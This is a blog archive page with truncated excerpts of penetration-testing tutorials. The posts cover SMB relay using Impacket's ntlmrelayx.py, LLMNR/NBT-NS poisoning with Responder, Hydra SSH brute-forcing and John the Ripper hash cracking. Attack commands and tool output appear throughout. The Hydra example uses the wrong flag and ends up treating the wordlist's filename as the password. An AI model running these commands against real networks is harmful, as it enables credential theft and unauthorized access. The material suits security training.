Showing posts from April, 2023

SMB Relay Attack

SMB Relay Attack Overview

SMB is commonly used for sharing files and printers and for communication between client and server. Before one can communicate with the other, the user is required to authenticate. This is simple access control. Although this control helps protect important files, it can also be manipulated so that authentication attempts are relayed and used to access other systems, and it can be abused to collect password hashes. This is where SMB relay comes into play: the attacker places themselves in the middle (MitM) and relays the authentication attempts. Once the end server has validated the credentials, access is granted to the attacker instead of the user.

What is an SMB Relay Attack?

An SMB relay attack is one where an attacker captures a user's NTLM hash and relays it to another machine on the network, masquerading as the user and authenticating against SMB to gain shell or file access.

Prerequisites

SMB signing disabled on the target. Must be on the local...

How to install Impacket/Ntlmrelayx.py

Ntlmrelayx.py is a Python script that will simply relay NTLMv1/v2 hashes. Installing it is straightforward on Kali Linux.

Step 1: Install the dependencies

Ldapdomaindump is needed first, which can be installed by typing

┌──(root㉿kali)-[/home/kali/ActiveDirectory]
└─# pip install ldap3 dnspython

┌──(root㉿kali)-[/home/kali/ActiveDirectory]
└─# pip install ldapdomaindump

Step 2: Once the dependencies are installed, download the Impacket suite

┌──(root㉿kali)-[/home/kali/ActiveDirectory]
└─# git clone https://github.com/CoreSecurity/impacket.git

Once downloaded, go to the directory and install it

┌──(root㉿kali)-[/home/kali/ActiveDirectory/impacket]
└─# python setup.py install

Once installed, you can run ntlmrelayx.py from any directory.

┌──(root㉿kali)-[/home/kali/ActiveDirectory/impacket]
└─# ntlmrelayx.py -tf target.txt -smb2support

LLMNR/NBT-NS Poisoning | Taking Advantage of NTLM Security Weaknesses

In this write-up we will talk about LLMNR/NBT-NS poisoning, as this attack vector is still prevalent today. The vast majority of assessments result in obtaining NTLMv1 and NTLMv2 hashes, which can then be cracked to gain Administrator access. In our example, we will use the tool called "RESPONDER" to intercept traffic on the network and gather these NTLMv1 and NTLMv2 hashes, and then we will give an overview of how these attacks work.

LLMNR/NBT-NS Poisoning Overview

Attackers can spoof an authoritative source for name resolution on a victim network by responding to LLMNR (UDP 5355) / NBT-NS (UDP 137) traffic as if they know the identity of the requested host, effectively poisoning the service so that victims communicate with the adversary-controlled system.

What is LLMNR?
- Used to identify hosts when DNS fails to do so
- Previously NBT-NS
- Key flaw is that the services utilize a user's username and NTLMv2 h...

Password Hacking Hydra

hydra -l user -p fasttrack.txt ssh://192.168.220.131 -V -I -F -t 40

┌──(root㉿kali)-[/usr/share/wordlists]
└─# hydra -l jeanpaul -p fasttrack.txt ssh://192.168.220.131 -V -I -F -t 4
Hydra v9.4 (c) 2022 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).

Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2023-04-07 00:31:22
[DATA] max 1 task per 1 server, overall 1 task, 1 login try (l:1/p:1), ~1 try per task
[DATA] attacking ssh://192.168.220.131:22/
[ATTEMPT] target 192.168.220.131 - login "jeanpaul" - pass "fasttrack.txt" - 1 of 1 [child 0] (0/0)
1 of 1 target completed, 0 valid password found
Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2023-04-07 00:31:24

JohnTheRipper:
john /tmp/hashes --wordlist /usr/share/wordlists/fasttrack.txt --format=crypt

Password Store in Windows: NTDS.DIT, SAM file, Reg...